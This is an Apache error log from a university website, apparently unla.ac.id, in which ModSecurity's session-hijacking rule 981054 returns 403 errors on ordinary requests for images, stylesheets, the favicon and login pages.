[Mon Aug 28 08:47:21.493584 2023] [:error] [pid 38683] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv8qcCo-f0AAJcb47YAAAAP"]
[Mon Aug 28 08:47:21.499386 2023] [:error] [pid 38643] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv8qcCo-f0AAJbzcB0AAAAD"]
[Mon Aug 28 08:47:21.538868 2023] [:error] [pid 38647] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv8qcCo-f0AAJb3RV0AAAAH"]
[Mon Aug 28 08:47:21.539715 2023] [:error] [pid 38303] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv8qcCo-f0AAJWfaEwAAAAI"]
[Mon Aug 28 08:47:21.558660 2023] [:error] [pid 38646] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv8qcCo-f0AAJb21AkAAAAB"]
[Mon Aug 28 08:47:21.570849 2023] [:error] [pid 38686] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv8qcCo-f0AAJceGIoAAAAA"]
[Mon Aug 28 08:47:21.590887 2023] [:error] [pid 38647] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv8qcCo-f0AAJb3RV4AAAAH"]
[Mon Aug 28 08:47:21.610739 2023] [:error] [pid 38643] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv8qcCo-f0AAJbzcB4AAAAD"]
[Mon Aug 28 08:47:21.618576 2023] [:error] [pid 38646] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv8qcCo-f0AAJb21AoAAAAB"]
[Mon Aug 28 08:47:22.235583 2023] [:error] [pid 38303] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8qsCo-f0AAJWfaE0AAAAI"]
[Mon Aug 28 08:47:30.600587 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8ssCo-f0AAJWfaE4AAAAI"]
[Mon Aug 28 08:47:32.153125 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8tMCo-f0AAJWfaE8AAAAI"]
[Mon Aug 28 08:47:34.152421 2023] [:error] [pid 38647] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv8tsCo-f0AAJb3RWAAAAAH"]
[Mon Aug 28 08:47:34.258549 2023] [:error] [pid 38686] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8tsCo-f0AAJceGI0AAAAA"]
[Mon Aug 28 08:47:38.882318 2023] [:error] [pid 38686] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv8usCo-f0AAJceGI4AAAAA"]
[Mon Aug 28 08:47:38.959149 2023] [:error] [pid 38646] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8usCo-f0AAJb21A0AAAAB"]
[Mon Aug 28 08:48:19.351957 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv848Co-f0AAJb3RWcAAAAH"]
[Mon Aug 28 08:48:19.373207 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv848Co-f0AAJcdfIAAAAAR"]
[Mon Aug 28 08:48:19.373304 2023] [:error] [pid 38644] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv848Co-f0AAJb0F9EAAAAK"]
[Mon Aug 28 08:48:19.541545 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv848Co-f0AAJcdfIEAAAAR"]
[Mon Aug 28 08:48:19.542608 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv848Co-f0AAJTiogwAAAAE"]
[Mon Aug 28 08:48:19.647695 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv848Co-f0AAJX1lioAAAAS"]
[Mon Aug 28 08:48:19.739389 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv848Co-f0AAJb0F9IAAAAK"]
[Mon Aug 28 08:48:21.134494 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv85cCo-f0AAJb21BUAAAAB"]
[Mon Aug 28 08:48:22.542118 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv85sCo-f0AAJceGJQAAAAA"]
[Mon Aug 28 08:48:22.691188 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv85sCo-f0AAJTiog0AAAAE"]
[Mon Aug 28 08:48:25.032497 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv86cCo-f0AAJceGJUAAAAA"]
[Mon Aug 28 08:48:25.104869 2023] [:error] [pid 38644] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv86cCo-f0AAJb0F9QAAAAK"]
[Mon Aug 28 08:48:31.030096 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv878Co-f0AAJcb470AAAAP"]
[Mon Aug 28 08:48:32.842682 2023] [:error] [pid 38646] [client 180.244.133.183] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/periksausm"] [unique_id "ZOv88MCo-f0AAJb21BoAAAAB"]
[Mon Aug 28 08:48:32.844274 2023] [:error] [pid 38686] [client 180.244.133.183] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv88MCo-f0AAJceGJYAAAAA"]
[Mon Aug 28 08:48:33.495009 2023] [:error] [pid 38646] [client 180.244.133.183] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv88cCo-f0AAJb21BsAAAAB"]
[Mon Aug 28 08:48:51.810364 2023] [:error] [pid 38114] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv9A8Co-f0AAJTiohMAAAAE"]
[Mon Aug 28 08:48:51.813399 2023] [:error] [pid 38644] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv9A8Co-f0AAJb0F9cAAAAK"]
[Mon Aug 28 08:48:51.828371 2023] [:error] [pid 38389] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv9A8Co-f0AAJX1ljEAAAAS"]
[Mon Aug 28 08:48:52.289706 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv9BMCo-f0AAJb21B4AAAAB"]
[Mon Aug 28 08:48:56.099887 2023] [:error] [pid 38648] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9CMCo-f0AAJb4sUEAAAAL"]
[Mon Aug 28 08:48:56.468817 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9CMCo-f0AAJb21B8AAAAB"]
[Mon Aug 28 08:48:59.051361 2023] [:error] [pid 38303] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9C8Co-f0AAJWfaFoAAAAI"]
[Mon Aug 28 08:48:59.257570 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9C8Co-f0AAJb21CAAAAAB"]
[Mon Aug 28 08:49:01.169486 2023] [:error] [pid 38683] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9DcCo-f0AAJcb48AAAAAP"]
[Mon Aug 28 08:49:01.398414 2023] [:error] [pid 38114] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9DcCo-f0AAJTiohQAAAAE"]
[Mon Aug 28 08:49:03.414367 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9D8Co-f0AAJb21CEAAAAB"]
[Mon Aug 28 08:49:12.902554 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv9GMCo-f0AAJb21CIAAAAB"]
[Mon Aug 28 08:49:13.843250 2023] [:error] [pid 38389] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9GcCo-f0AAJX1ljMAAAAS"]
[Mon Aug 28 08:49:50.779591 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv9PsCo-f0AAJcb48UAAAAP"]
[Mon Aug 28 08:49:52.255627 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9QMCo-f0AAJX1ljcAAAAS"]
[Mon Aug 28 08:49:52.299723 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9QMCo-f0AAJceGKIAAAAA"]
[Mon Aug 28 08:49:55.701123 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv9Q8Co-f0AAJceGKMAAAAA"]
[Mon Aug 28 08:49:55.729467 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9Q8Co-f0AAJbxo@cAAAAJ"]
[Mon Aug 28 08:50:05.196166 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv9TcCo-f0AAJX1ljkAAAAS"]
[Mon Aug 28 08:50:05.491141 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv9TcCo-f0AAJcdfIoAAAAR"]
[Mon Aug 28 08:50:05.567483 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9TcCo-f0AAJbxo@kAAAAJ"]
[Mon Aug 28 08:50:07.764454 2023] [:error] [pid 38686] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOv9T8Co-f0AAJceGKYAAAAA"]
[Mon Aug 28 08:50:08.430564 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv9UMCo-f0AAJbxo@oAAAAJ"]
[Mon Aug 28 08:50:08.457440 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9UMCo-f0AAJX1ljoAAAAS"]
[Mon Aug 28 08:50:13.923867 2023] [:error] [pid 38389] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9VcCo-f0AAJX1ljsAAAAS"]
[Mon Aug 28 08:50:15.992721 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9V8Co-f0AAJcb48gAAAAP"]
[Mon Aug 28 08:50:16.122487 2023] [:error] [pid 38690] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9WMCo-f0AAJciCsMAAAAG"]
[Mon Aug 28 08:50:18.946424 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9WsCo-f0AAJceGKkAAAAA"]
[Mon Aug 28 08:50:18.999952 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9WsCo-f0AAJcfLJ0AAAAC"]
[Mon Aug 28 08:50:21.762111 2023] [:error] [pid 38646] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9XcCo-f0AAJb21C4AAAAB"]
[Mon Aug 28 08:50:21.800151 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9XcCo-f0AAJcdfI0AAAAR"]
[Mon Aug 28 08:50:23.107331 2023] [:error] [pid 38683] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9X8Co-f0AAJcb48oAAAAP"]
[Mon Aug 28 08:50:26.137057 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9YsCo-f0AAJcb48sAAAAP"]
